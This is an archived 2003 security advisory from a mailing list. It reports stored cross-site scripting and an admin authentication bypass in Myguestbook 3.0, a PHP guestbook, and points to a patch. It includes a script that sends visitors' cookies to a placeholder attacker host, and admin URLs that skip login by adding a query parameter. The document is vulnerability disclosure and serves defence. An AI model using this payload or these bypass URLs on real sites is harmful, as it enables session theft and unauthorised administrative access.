[VulnWatch] Myguestbook (PHP)

From: Frog Man (leseulfrog@hotmail.com)
Date: 02/21/03

  • Next message: Rain Forest Puppy: "[VulnWatch] CERT Advisory CA-2003-06 Multiple vulnerabilities in SIP/VoIP" 
    From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Fri, 21 Feb 2003 08:02:58 +0100

    Informations :
    °°°°°°°°°°°°°°
    Version : 3.0
    Website : http://www.tefonline.net/
    Problems :
    - XSS -> admin infos recovery
    - Access to admin pages

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    If pseudo = [SCRIPT],
    e-mail = >[SCRIPT]
    or message = </textarea>[SCRIPT]

    [SCRIPT] will be executed on index.php, /admin/user_modif.php,
    /admin/admin_modif.php and /admin/admin_suppr.php .

    /admin/confirm_connect.php :
    ---------------------------------------------
    SetCookie("Myguestbook","$name:$password");
    ---------------------------------------------

    /admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and
    /admin/admin_suppr.php :
    --------------------------------------------------------------------
    <?
    if(!isset($Myguestbook))
              header("location:../index.php?MSG=permis");
    ?>
    --------------------------------------------------------------------

    Exploits :
    °°°°°°°°°°
    [SCRIPT] :
    <script>
    location='http://[attacker]/file.php?'+document.cookie;
    </script>

    http://[target]/admin/admin_index.php?Myguestbook=1
    http://[target]/admin/admin_pass.php?Myguestbook=1
    http://[target]/admin/admin_modif.php?Myguestbook=1
    http://[target]/admin/admin_suppr.php?Myguestbook=1

    http://[target]/admin/user_modif.php?id=[MESSAGEID]

    Solution :
    °°°°°°°°°°
    A patch can be found on http://www.phpsecure.org.

    More Details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/Myguestbook.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyguestbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools:57 +0100 (CET)

    frog-m@n

    _________________________________________________________________